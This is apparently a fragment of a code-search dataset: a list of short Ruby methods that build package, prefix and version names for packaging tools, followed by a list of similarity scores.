"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def prefix_for(ns_uri)\n if namespaces_by_uri().has_key?(ns_uri)\n namespaces_by_uri()[ns_uri].prefix || \"\" # namespace.prefix returns nil if there is no prefix defined (default prefix)\n end\n end",
"def get_radiant_player_app_name()\n app_name = \"Radiant Player\"\n return app_name\nend",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def var_prefix\n # ugh, i was generating meta/qb.yml files that set 'var_prefix' to\n # `null`, but it would be nice to\n # \n meta_or 'var_prefix', namespaceless\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def platform_version_for_package\n if platform == 'rhel'\n platform_version[/([\\d]+)\\..+/, 1]\n else\n platform_version\n end\n end",
"def var; HOMEBREW_PREFIX+'var' end",
"def var; HOMEBREW_PREFIX+'var' end",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def base_prefix\n HaridsyncHelpers.ensure_uppercase_dn_component(group['ou'] || DEFAULT_PREFIX)\n end",
"def install_root\n Pathname.new(ENV[\"PREFIX\"] || \"/var/www/ood/apps/sys\")\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def redis_prefix\n @redis_prefix ||= name.underscore\n end",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def prefix\n nil\n end",
"def global_prefix\n self.class.global_prefix\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def prefix\n self.class.prefix\n end",
"def prefix(browser, version = nil)\n assert_valid_browser browser\n assert_valid_version browser, version if version\n data = browser_data(browser)\n p = if data[\"prefix_exceptions\"] && data[\"prefix_exceptions\"][version]\n data[\"prefix_exceptions\"][version]\n else\n data[\"prefix\"]\n end\n \"-#{p}\"\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def prefix_dir_of(selection)\n if workspace_dir?(selection)\n ws.prefix_dir\n elsif find_package_set(selection)\n raise NoSuchDir, \"#{selection} is a package set, and package sets do not have prefixes\"\n else\n resolve_package(selection).prefix\n end\n end",
"def prefix\n fetch('university.prefix')\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def prefix\n raise NotImplementedError\n end",
"def version_number\n self.name =~ /RHEL-([0-9]+)/\n return $1.to_i\n end",
"def account_prefix\n current_account.account_prefix\n end",
"def prefix\n \"#{name}::\"\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def get_namespace(node, prefix); end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def prefix\n fetch('superhero.prefix')\n end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def prefix\n ''\n end",
"def repo_name\n @repo_name ||= InchCI::ProjectUID.new(uid).repo_name\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def gem_name\n \"#{@account}-#{@name}\"\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def repo_name(repo)\n name = nil\n case repo\n when 'stable'\n name = 'omnibus-stable-local'\n when 'current'\n name = 'omnibus-current-local'\n when nil # pass through\n else\n raise \"#{repo} not supported. must be current or stable\"\n end\n name\nend",
"def kafka_base\n %(kafka_#{node[:kafka][:scala_version]}-#{node[:kafka][:version]})\nend",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def current_package\n @current_package\n end",
"def prefix\n @data['prefix']\n end",
"def platform_name; non_framework_platforms.first; end",
"def prefixed(p)\n condition { env['enron.api.prefix'] == p }\n end",
"def version_pathname(splunk_home)\n Pathname.new(splunk_home).join('etc/splunk.version')\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def prefix\n @obj['prefix']\n end",
"def prefix(num)\n namespace + '_prefix_' + num.to_s\n end",
"def version_prefix\n '/v2'\n end",
"def prefix_tag(tag)\n tag = Origen::VersionString.new(tag)\n if tag.semantic?\n tag.prefixed\n else\n tag\n end\n end",
"def name_prefix=(_arg0); end",
"def cli_prefix; end",
"def fully_qualified_ruby_name\n return \"::#{self.package.gsub('.', '::')}\"\n end",
"def get_fuseki_command_prefix(args)\n args[:path] ? \"cd #{args[:path]}; #{args[:path]}/\" : \"\"\n end",
"def get_ai_repo_version(options)\n options = get_ai_publisherurl(options)\n if options['test'] == true || options['host-os-name'].to_s.match(/Darwin/)\n version = \"0.175.1\"\n else\n message = \"Information:\\tDetermining if available repository version from \"+options['publisherurl']\n command = \"pkg info -g #{options['publisherurl']} entire |grep Branch |awk \\\"{print \\\\\\$2}\\\"\"\n version = execute_command(options,message,command)\n version = version.chomp\n version = version.split(/\\./)[0..2].join(\".\")\n end\n return version\nend",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end"
] | [
"0.7867165",
"0.66621006",
"0.6451794",
"0.64171606",
"0.6342943",
"0.6251559",
"0.62242717",
"0.620227",
"0.61056644",
"0.6062629",
"0.60344064",
"0.6009978",
"0.5993054",
"0.5879808",
"0.5875949",
"0.5858529",
"0.58561265",
"0.58542913",
"0.5852562",
"0.5847498",
"0.58407396",
"0.5837573",
"0.582394",
"0.581892",
"0.57747805",
"0.57630014",
"0.57600987",
"0.5757714",
"0.5757189",
"0.5748886",
"0.57485986",
"0.5746597",
"0.5746597",
"0.57423913",
"0.57418996",
"0.56979007",
"0.5687432",
"0.5678601",
"0.56784475",
"0.5676627",
"0.5674014",
"0.5621278",
"0.56192124",
"0.5612504",
"0.5610792",
"0.5600917",
"0.5590607",
"0.5581227",
"0.55787516",
"0.55716956",
"0.5569686",
"0.55627304",
"0.55463004",
"0.5535694",
"0.553177",
"0.55294156",
"0.55134726",
"0.5511342",
"0.5486464",
"0.54712147",
"0.54634976",
"0.54568833",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.5453332",
"0.5453332",
"0.5452936",
"0.5452333",
"0.5444958",
"0.5444608",
"0.54306424",
"0.5425343",
"0.54218477",
"0.5412991",
"0.5406126",
"0.5398231",
"0.5393852",
"0.5391214",
"0.5390703",
"0.5387568",
"0.5376974",
"0.53710926",
"0.5369542",
"0.5367661",
"0.5359313",
"0.53546923",
"0.5349675",
"0.53459215",
"0.53369474",
"0.5328167",
"0.531456",
"0.53131795"
] | 0.76407176 | 1 |
The debian name of a package: either rock[-<release>]-<name> or, for ruby packages, rock[-<release>]-ruby-<name>; the release-name prefix can be avoided by setting with_rock_release_prefix to false | def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)
if pkginfo.kind_of?(String)
raise ArgumentError, "method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'"
end
name = pkginfo.name
debianize_name(name,
build_type: pkginfo.build_type,
with_rock_release_prefix: with_rock_release_prefix,
release_name: release_name)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_name\n raise NotImplementedError\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => 
deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def reprepro_has_package?(debian_pkg_name, release_name, codename, arch)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -A #{arch} -T deb -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: #{debian_pkg_name} available for #{codename} #{arch}\"\n return true\n else\n Packager.info \"Reprepro: #{debian_pkg_name} not available for #{codename} #{arch}\"\n return false\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
